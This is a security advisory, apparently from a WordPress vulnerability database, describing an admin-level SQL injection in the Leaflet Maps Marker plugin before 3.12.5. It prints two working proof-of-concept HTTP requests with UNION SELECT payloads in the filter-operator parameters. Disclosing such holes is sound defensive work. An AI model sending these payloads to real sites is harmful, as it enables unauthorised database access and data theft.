WordPress Plugin Vulnerabilities

Leaflet Maps Marker < 3.12.5 - Admin+ SQLi

Description

The plugin does not properly sanitize some parameters before inserting them into SQL queries. As a result, high privilege users could perform SQL injection attacks.

Proof of Concept

PoC for filter-operator1 parameter:

POST /wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 476
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

action_standalone=export&filter-layer=select-all&limit-from=0&limit-to=100&filter-markername=_NOT_FOUND_&filter-operator1=)+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+&filter-popuptext=1&filter-exclude-markername=&filter-operator2=AND&filter-exclude-popuptext=&filter-icon=icon-any&export-format=csv&caching-method=auto&caching-discisam-directory=&caching-phptemp-filesize=8&submit=start+export

======
PoC for filter-operator2 parameter:


POST /wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 474
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

action_standalone=export&filter-layer=select-all&limit-from=0&limit-to=100&filter-markername=&filter-operator1=&filter-popuptext=1&filter-exclude-markername=1&filter-operator2=)+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+&filter-exclude-popuptext=_NOT_FOUND_&filter-icon=icon-any&export-format=csv&caching-method=auto&caching-discisam-directory=&caching-phptemp-filesize=8&submit=start+export

Affects Plugins

Fixed in 3.12.5

References

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
Ihor Bliumental
Submitter
Ihor Bliumental
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-08-08 (about 1 years ago)
Added
2022-08-08 (about 1 years ago)
Last Updated
2023-05-05 (about 1 years ago)

Other